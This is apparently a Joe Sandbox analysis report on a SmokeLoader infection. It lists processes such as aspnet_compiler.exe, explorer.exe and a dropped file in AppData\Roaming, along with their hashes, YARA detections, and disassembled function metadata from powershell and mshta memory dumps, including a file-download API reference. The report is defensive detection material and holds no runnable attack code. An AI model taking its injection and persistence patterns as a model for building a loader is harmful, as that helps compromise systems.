Show Windows behavior

Target ID:	13
Start time:	12:37:41
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x890000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:37:46
Start date:	18/11/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:38:07
Start date:	18/11/2024
Path:	C:\Users\user\AppData\Roaming\djvbaae
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\djvbaae
Imagebase:	0x190000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:38:08
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:38:09
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x8f0000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:38:10
Start date:	18/11/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:38:11
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x8f0000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:38:12
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x8f0000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	12:38:14
Start date:	18/11/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:38:15
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x8f0000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	12:38:16
Start date:	18/11/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3484 -s 724
Imagebase:	0x7ff6d5680000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:38:16
Start date:	18/11/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	12:38:17
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x8f0000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	12:38:18
Start date:	18/11/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 06840FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6840000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 06840FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6840000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 06840FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6840000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 06840FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1797456310.0000000006840000.00000010.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6840000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: 5e2ad2e18c959ca5aaa81151c4e95e5c20628615c22dbded9d0d302626e56001
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 5592, Parent PID: 6736COMMON

Executed Functions

Function 046B4B90 Relevance: 2.0, APIs: 1, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1933737052.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_46b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7552036f67c330851f73a1d9966dd4fa94ea56b06a36eadcab0a5b72db30fa
Instruction ID: 3e401906f4e6aa12de8931606c61a0f248cccbd10dfef31f99a533216f19f8d0
Opcode Fuzzy Hash: 8f7552036f67c330851f73a1d9966dd4fa94ea56b06a36eadcab0a5b72db30fa
Instruction Fuzzy Hash: 4C222775A00219AFCB05CF98D984ADEBBB2FF88310F248559E855AB365D731ED81CF90

Function 076004F8 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

tP^q, xrefs: 0760057E
tP^q, xrefs: 0760058A

Memory Dump Source

Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 0427d77b899778f9f16ce3faf45805f7bbe906aa2c5ec92afdacb92622f6bb7d
Instruction ID: 9db34cedc557842d5018c9b73bb1a476ad14ebbecb2949cdef86d1917a540079
Opcode Fuzzy Hash: 0427d77b899778f9f16ce3faf45805f7bbe906aa2c5ec92afdacb92622f6bb7d
Instruction Fuzzy Hash: F85134B1B00214AFC7295A78C914B2BBFA2ABC9710F14845AE54ADF391CA71DC45C7E1

Function 046B1A2F Relevance: 1.6, APIs: 1, Instructions: 69filenetworkCOMMON

Download Yara Rule

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 046B51A9

Memory Dump Source

Source File: 00000001.00000002.1933737052.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_46b0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: b798865277727e3b6e112f15e450eb6906016bfa78ab36e6dedbe6319c9b2aea
Instruction ID: ec3f463860c44e4fc6a2a73fbe8b782d4724a21bdf6b60e5d07c3d7f20ce820c
Opcode Fuzzy Hash: b798865277727e3b6e112f15e450eb6906016bfa78ab36e6dedbe6319c9b2aea
Instruction Fuzzy Hash: F72104B1D01259EFCB00CF99D984ADEFBB4FB48314F10812AE919A7310D375AA94CBA4

Function 0760122E Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e10919c06b457af901f5eaeb1ed573af1bc304dd328ed78faf3b4fc1fb5911d
Instruction ID: a2d9db5346d1f03d02c65c81db512cf637a82b5e0fbbadeccef2d2789471941f
Opcode Fuzzy Hash: 3e10919c06b457af901f5eaeb1ed573af1bc304dd328ed78faf3b4fc1fb5911d
Instruction Fuzzy Hash: B1B1A4B4B402089FCB1D9F68D914A6EBBE2FB89710F148459E9069F390DA71EC46CBD1

Function 02E3D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1933213469.0000000002E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0b00e5c1acba123c9f6a3fc5e4d69be733e603e68859fe19ecd298e2d64110
Instruction ID: 6305853e0bad493398720d7f2c87392448ae27e24129a815a0edf9f503b49d84
Opcode Fuzzy Hash: 6c0b00e5c1acba123c9f6a3fc5e4d69be733e603e68859fe19ecd298e2d64110
Instruction Fuzzy Hash: 5D01526104E3C09ED7138B258C94B62BFB4DF53629F1DC0DBD8888F1A7C2695849CB72

Function 02E3D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1933213469.0000000002E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9042bfb5eacd70f1ddfdad6063ec4c05034a4255d8feb8b5add2318d4d1b98f9
Instruction ID: c87a1e78c0072e12c17ace8d1d76a9f56005df3f0b2b498032f8bd8b95572a92
Opcode Fuzzy Hash: 9042bfb5eacd70f1ddfdad6063ec4c05034a4255d8feb8b5add2318d4d1b98f9
Instruction Fuzzy Hash: 32012B714483009AE7124F25CDC8767BF98DF41729F08C429EC084B246C379D841CEB1

Non-executed Functions

Function 07600B70 Relevance: 6.4, Strings: 5, Instructions: 161COMMON

Download Yara Rule

Strings

$^q, xrefs: 07600D4E
4'^q, xrefs: 07600C27
X=Nl, xrefs: 07600D24
4'^q, xrefs: 07600C33
$^q, xrefs: 07600D5A

Memory Dump Source

Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$X=Nl$$^q$$^q
API String ID: 0-684221529
Opcode ID: b1933274f0b8c6cca7dd5f4ca7696d59286f41f50a30b9e66001bad4f2c19581
Instruction ID: 7efd1716758b0554526b71fe191a8b164dad391f7e7673e0d0e012e69f92c4da
Opcode Fuzzy Hash: b1933274f0b8c6cca7dd5f4ca7696d59286f41f50a30b9e66001bad4f2c19581
Instruction Fuzzy Hash: A851E6B17043098FD7299B78C41476BBBE1AFC6214F14856AC456CB3E5DB31D846CBE1

Function 07600082 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076000F7
$^q, xrefs: 076000D6
$^q, xrefs: 076000CA
4'^q, xrefs: 076000EB

Memory Dump Source

Source File: 00000001.00000002.1956204117.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 5b1877c58f02201076adf7d98013dcb6b83f3bef4e40f16b62ecffaade6c2bb1
Instruction ID: 4cef4733397521f6d5649a31e89e6fadacdfc6ac5f0ca0c51ad5af9fbeb73358
Opcode Fuzzy Hash: 5b1877c58f02201076adf7d98013dcb6b83f3bef4e40f16b62ecffaade6c2bb1
Instruction Fuzzy Hash: 9501B16164D3C90FD72F02381C206666FB65BC3651B1A44D7C082DF2A7C9654D4A83E3

Analysis Process: powershell.exePID: 6036, Parent PID: 5592COMMON

Executed Functions

Function 07D91C10 Relevance: 5.6, Strings: 4, Instructions: 589COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07D920B0
4'^q, xrefs: 07D920BA
4'^q, xrefs: 07D91F4E
4'^q, xrefs: 07D91F58

Memory Dump Source

Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: d37b59aa7f1e9f45892451b9b032d0bc453842b72cd76f9485e163ae09534484
Instruction ID: ff7199e5adea815dd4789b6d9f932b11abedc4a174a9fb2883ee44ce765e7d2f
Opcode Fuzzy Hash: d37b59aa7f1e9f45892451b9b032d0bc453842b72cd76f9485e163ae09534484
Instruction Fuzzy Hash: 301258B1B0431A9FDF159B68881076AFBA2AFC2310F1480BBD545DF391DB32D985C7A2

Function 036C4C00 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

?o^, xrefs: 036C4C9A

Memory Dump Source

Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID: ?o^
API String ID: 0-3200282660
Opcode ID: 3a1ddc83059f90f0d98ef0eaddec02486b1b72a9d0d25635f59a5eb2d39912d7
Instruction ID: 044c52f8e359bf98a07e791023555d553cdea832b897f669ea308774945704fe
Opcode Fuzzy Hash: 3a1ddc83059f90f0d98ef0eaddec02486b1b72a9d0d25635f59a5eb2d39912d7
Instruction Fuzzy Hash: 6E518130A0A3E15FC707DB6DD864599BFB4EF47200B0940DBC494DF2A3C624E849C7A6

Function 036C29F0 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05acfa09be592331026d2109790798a9c22c32bfa8dbb9b5cee11a7adec131d7
Instruction ID: 78de8872ac0b2031b2123614ce7fffb4f3d7084ac8f2bfca3ed870cea0b73baf
Opcode Fuzzy Hash: 05acfa09be592331026d2109790798a9c22c32bfa8dbb9b5cee11a7adec131d7
Instruction Fuzzy Hash: 40916BB0A006458FCB15CF9DC5949BAFBB1FF49310B248AA9D815AB365C736FC51CBA0

Function 07D91BF0 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 269c5a2306b8183d34d04be975dc76984c799e8a991c93a9f9f9ad31330a2f64
Instruction ID: 9592f5a7c9b02a71c0589bb16d8a82d7242a1143756c671bf7ae90cf22e71be1
Opcode Fuzzy Hash: 269c5a2306b8183d34d04be975dc76984c799e8a991c93a9f9f9ad31330a2f64
Instruction Fuzzy Hash: 5A41D5F4A0430BCFDF158B658900A6AFBB2AF85254F5881B6D504DF251C732CA85CBA2

Function 036C2B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15c23a263338b60f3d8bcf32acc26bd6d96426eb5b1125ce9d67086d858b3d1
Instruction ID: 1b81a7b31f86bec78e39cb6dea51182956a84eeb8c4909edbf57138d4266b4dd
Opcode Fuzzy Hash: b15c23a263338b60f3d8bcf32acc26bd6d96426eb5b1125ce9d67086d858b3d1
Instruction Fuzzy Hash: FA415AB4A106458FCB06CF58C5A89BAFBB1FF49310B1585A9D815AB364C736FC51CFA0

Function 036C4BF0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1823631450.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69fb91103b5d098eb1dd495e6f085bb1d558d56b3ca80c52805b32cd00f74131
Instruction ID: 4452265df801de2f6ad94a98c29fcbefd3d288d185c4aeddeb3eef69b4348370
Opcode Fuzzy Hash: 69fb91103b5d098eb1dd495e6f085bb1d558d56b3ca80c52805b32cd00f74131
Instruction Fuzzy Hash: 63211A74A002598FCB05DF99D5909AEFBB5FF8A310B148499D819AB361C731EC49CBA1

Function 035CD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1823299254.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf01be0ea1f25e8852decf771ee8df4832c3581613a252b06886591bcc5d71b
Instruction ID: 770b88d4eba54de898315aaf1bea0faf9c0bfad725643f768c2351bba448d5df
Opcode Fuzzy Hash: 9bf01be0ea1f25e8852decf771ee8df4832c3581613a252b06886591bcc5d71b
Instruction Fuzzy Hash: 3C01D4310093809EE710CA6ADD84767BFE8EF41328F0CC87DED489A156D2799842C6B1

Function 035CD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1823299254.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee12ae61e32b7ea7d824a793bd7147db096f2f7e4c8b419b9086faeab9ae3003
Instruction ID: 1441547122a265afbb72be3d922b1a903e8c565122d4b01529fc56a2f23ceb15
Opcode Fuzzy Hash: ee12ae61e32b7ea7d824a793bd7147db096f2f7e4c8b419b9086faeab9ae3003
Instruction Fuzzy Hash: D801407100E3C09ED7128B25DC94B52BFB4EF47224F1D84DBD9889F1A7D2699845C772

Non-executed Functions

Function 07D904E0 Relevance: 9.1, Strings: 7, Instructions: 324COMMON

Download Yara Rule

Strings

$^q, xrefs: 07D906E8
tP^q, xrefs: 07D90739
$^q, xrefs: 07D906F4
4'^q, xrefs: 07D905E3
$^q, xrefs: 07D906C2
tP^q, xrefs: 07D9072D
4'^q, xrefs: 07D905EF

Memory Dump Source

Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 0d32afcd3005749ca440dacae61fbbb6c252d57619ae142da8b86c4014453eee
Instruction ID: e038081b07d28eee42fe5df8d1b884b84f47a2f03e5ab74051b110344f2bfe9a
Opcode Fuzzy Hash: 0d32afcd3005749ca440dacae61fbbb6c252d57619ae142da8b86c4014453eee
Instruction Fuzzy Hash: 10A167B17043179FDB254A69A81067AFBE5AFC6620F28847BD485CB3A1DB31CC45CBE1

Function 07D90284 Relevance: 7.6, Strings: 6, Instructions: 80COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07D90373
4'^q, xrefs: 07D902F7
$^q, xrefs: 07D90352
$^q, xrefs: 07D9035E
4'^q, xrefs: 07D902EB
4'^q, xrefs: 07D9037F

Memory Dump Source

Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
API String ID: 0-1041444323
Opcode ID: 1ce3ab82cf0fef103fcd7fa4508542d89503248d1429e5dee7e20c9e7ee99a26
Instruction ID: 1d5d8d50a8626006360bc58fad4a145bb50eb5c9692de85a87b0b8fdd1858389
Opcode Fuzzy Hash: 1ce3ab82cf0fef103fcd7fa4508542d89503248d1429e5dee7e20c9e7ee99a26
Instruction Fuzzy Hash: 8A210871B4935B4FCB2A156838201A9EFF71FC256072944BBC441CF35ACE258C494392

Function 07D93228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07D93256
$^q, xrefs: 07D93284
$^q, xrefs: 07D93290
$^q, xrefs: 07D9323A

Memory Dump Source

Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 3472a785e92be54088e42ed16bb9587468e7fe7ce12ed6c43f8adea773ca95b5
Instruction ID: b319b652e68ae8597def1c5b7a3425d550fa07bdcbec62b59dff581048b1af43
Opcode Fuzzy Hash: 3472a785e92be54088e42ed16bb9587468e7fe7ce12ed6c43f8adea773ca95b5
Instruction Fuzzy Hash: 502166B171430A9BEF34596E8C04BABEBDA9BC2714F64843AE405CF385CE32C8458361

Analysis Process: powershell.exePID: 6168, Parent PID: 6964COMMON

Executed Functions

Function 0372D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2657530595.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_372d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc63652498309a6f4a2b1d53a1e1a9e62bde87140b6c13b3ed265df29942222
Instruction ID: f5758eac0ef6020235ce32bce993fa25b208a28b3f96d1188a327f2ae5a0c571
Opcode Fuzzy Hash: afc63652498309a6f4a2b1d53a1e1a9e62bde87140b6c13b3ed265df29942222
Instruction Fuzzy Hash: 4F012B711083189AE730CA25CD84B67FFDCDF41324F0CC569EC684B156C279D841C6B1

Function 0372D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2657530595.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_372d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c6cbf3290623a964a9fa6985fd7d86b444408319cc784c39f9463969857dc6
Instruction ID: 11fa676255ae8cf346cdc3496c287882299ab96d4d17df5fa21320ba0f176c7e
Opcode Fuzzy Hash: e8c6cbf3290623a964a9fa6985fd7d86b444408319cc784c39f9463969857dc6
Instruction Fuzzy Hash: 20012D6100E3C49ED7228B258894B62BFB4EF47224F1D81DBD8888F1A3C2699848C772

Function 04DF3006 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2659098541.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c27c1573b4e3f42b3a4ef3340846f09b22589ad566c0f11f8d5151dcad7fd9d
Instruction ID: b7a411d1e5e3396aaf1ad6144835461ae929ebb38e48d8635e34442d11ee2825
Opcode Fuzzy Hash: 1c27c1573b4e3f42b3a4ef3340846f09b22589ad566c0f11f8d5151dcad7fd9d
Instruction Fuzzy Hash: DBF0D435A001099FCB15CF9DD990AEEF7B1FF88324F218159E915A72A1C736EC62CB60

